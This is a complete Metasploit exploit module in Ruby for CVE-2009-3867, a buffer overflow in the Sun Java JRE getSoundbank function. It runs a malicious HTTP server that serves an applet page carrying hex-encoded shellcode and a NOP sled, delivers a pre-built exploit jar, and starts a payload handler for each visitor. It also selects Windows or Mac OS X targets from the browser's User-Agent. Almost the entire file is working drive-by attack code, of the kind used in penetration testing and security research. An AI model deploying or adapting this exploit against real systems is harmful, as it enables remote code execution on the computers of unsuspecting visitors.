##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
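class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  # Seconds of inactivity after which a client's entry in the per-IP target
  # cache is discarded.
  TARGETCACHE_TTL = 60

  # Four single-byte NOPs handed to the applet through the 'np' PARAM.
  NOP_SLED = "\x90\x90\x90\x90".freeze

  # Set to true to prefix the payload with an int3 and hex-dump it to the log.
  DEBUG_PAYLOAD = false

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sun Java JRE getSoundbank file:// URI Buffer Overflow',
        'Description' => %q{
          This module exploits a flaw in the getSoundbank function in the Sun JVM.

          The payload is serialized and passed to the applet via PARAM tags. It must be
          a native payload.

          The effected Java versions are JDK and JRE 6 Update 16 and earlier,
          JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and
          earlier, and SDK and JRE 1.3.1_26 and earlier.

          NOTE: Although all of the above versions are reportedly vulnerable, only
          1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'kf', # Original PoC/exploit
          'jduck' # metasploit version
        ],
        'References' => [
          [ 'CVE', '2009-3867' ],
          [ 'OSVDB', '59711' ],
          [ 'BID', '36881' ],
          [ 'ZDI', '09-076' ]
        ],
        'Payload' => {
          'Space' => 1024,
          'BadChars' => '',
          'DisableNops' => true
        },
        'Targets' => [
          # No automatic targetting for now ...
          #
          # The User-Agent based selection in on_request_uri indexes targets[1..3],
          # which only lines up once this entry is restored at index 0:
          #
          #   [ 'J2SE 1.6_16 Automatic',
          #     {
          #       'Platform' => %w{ linux osx win },
          #       'Arch' => [ARCH_X86, ARCH_PPC]
          #     }
          #   ],
          [
            'J2SE 1.6_16 on Windows x86',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [
            'J2SE 1.6_16 on Mac OS X PPC',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC
            }
          ],
          [
            'J2SE 1.6_16 on Mac OS X x86',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2009-11-04',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Load the pre-built applet jar from the data directory into memory, then
  # start the HTTP server (super).
  #
  # @raise [SystemCallError] if the jar cannot be read from the data directory
  def exploit
    path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2009-3867.jar')
    # binread opens in 'rb', reads the whole file and closes the handle even
    # if the read raises, so no explicit close/ensure is needed
    @jar_data = File.binread(path)

    super
  end

  # Handle one HTTP request from a client.
  #
  # A request whose path does not end in .jar is either redirected so the path
  # ends with '/' (so the applet's relative archive name resolves) or answered
  # with the applet loader page. A .jar request receives the jar itself and
  # starts the payload handler for that client.
  #
  # @param cli [Rex::Proto::Http::ServerClient] the connected client
  # @param req [Rex::Proto::Http::Request] the parsed request
  def on_request_uri(cli, req)
    now = Time.now.to_i
    touch_targetcache(cli.peerhost, now)
    select_automatic_target(cli, req) if target.name =~ /Automatic/
    expire_targetcache(now)

    # Request processing
    if req.uri.match?(/\.jar$/i)
      # Send the actual applet over
      print_status('Sending applet')
      send_response(cli, generate_applet(cli, req), {
        'Content-Type' => 'application/octet-stream',
        'Pragma' => 'no-cache'
      })

      # Handle the payload
      handler(cli)
      return
    end

    # Redirect to the base directory so the applet code loads...
    unless req.uri.match?(%r{/$})
      print_status('Sending redirect so path ends with / ...')
      send_redirect(cli, get_resource + '/', '')
      return
    end

    # Display the applet loading HTML
    print_status('Sending HTML')
    send_response_html(cli, generate_html(payload.encoded), {
      'Content-Type' => 'text/html',
      'Pragma' => 'no-cache'
    })
  end

  # Build the loader page: an <applet> tag whose archive name is randomised
  # per request and whose PARAMs carry the hex-encoded payload ('sc') and
  # NOP sled ('np').
  #
  # @param pl [String] the encoded payload bytes
  # @return [String] the HTML page
  def generate_html(pl)
    html = <<~HTML
      <html>
      <head>
      <!-- <meta http-equiv=refresh content=10 /> -->
      </head>
      <body>
      <applet width='100%' height='100%' code='AppletX' archive='JARNAME'>
      <param name='sc' value='SCODE' />
      <param name='np' value='NOPS' />
      </applet>
      </body>
      </html>
    HTML

    # finalize the html
    jar_name = rand_text_alphanumeric(32) + '.jar'

    # add payload; String.new gives a binary buffer so appending the
    # encoded payload never trips an encoding-compatibility error
    pload = String.new
    pload << "\xcc" if DEBUG_PAYLOAD
    pload << pl
    # pad to a multiple of 4 bytes with random filler
    remainder = pload.bytesize % 4
    pload << rand_text(4 - remainder) if remainder > 0
    if DEBUG_PAYLOAD
      print_status("pload #{pload.bytesize} bytes:\n" + Rex::Text.to_hex_dump(pload))
    end

    # add nops
    # print_status("nops #{NOP_SLED.length} bytes:\n" + Rex::Text.to_hex_dump(NOP_SLED))

    html.gsub(/JARNAME/, jar_name)
        .gsub(/SCODE/, Rex::Text.to_hex(pload, ''))
        .gsub(/NOPS/, Rex::Text.to_hex(NOP_SLED, ''))
  end

  # Return the jar body to serve for a client.
  #
  # With an Automatic target the jar is only served once a concrete target has
  # been cached for the client's IP; otherwise an empty body is returned.
  #
  # @param cli [Rex::Proto::Http::ServerClient] the connected client
  # @param _req [Rex::Proto::Http::Request] unused
  # @return [String] the jar bytes loaded in #exploit, or '' when no target is cached
  def generate_applet(cli, _req)
    return '' if target.name =~ /Automatic/ && !@targetcache[cli.peerhost][:target]

    @jar_data
  end

  private

  # Record that +addr+ was seen at +now+ in the per-IP target cache, creating
  # the cache and the entry on first use.
  def touch_targetcache(addr, now)
    @targetcache ||= {}
    @targetcache[addr] ||= {}
    @targetcache[addr][:update] = now
  end

  # Pick a concrete target for the Automatic target from the User-Agent and
  # cache it for the client. The indices assume the commented-out Automatic
  # entry in initialize is restored at index 0 of Targets.
  def select_automatic_target(cli, req)
    ua = req.headers['User-Agent']
    case ua
    when /Windows/i
      print_status('Choosing a Windows target')
      @targetcache[cli.peerhost][:target] = targets[1]
    when /PPC Mac OS X/i
      print_status('Choosing a Mac OS X PPC target')
      @targetcache[cli.peerhost][:target] = targets[2]
    when /Intel Mac OS X/i
      print_status('Choosing a Mac OS X x86 target')
      @targetcache[cli.peerhost][:target] = targets[3]
    else
      print_status("Unknown target for: #{ua}")
    end
  end

  # Drop cache entries not updated within TARGETCACHE_TTL seconds of +now+.
  def expire_targetcache(now)
    @targetcache.delete_if { |_addr, entry| now > entry[:update] + TARGETCACHE_TTL }
  end
end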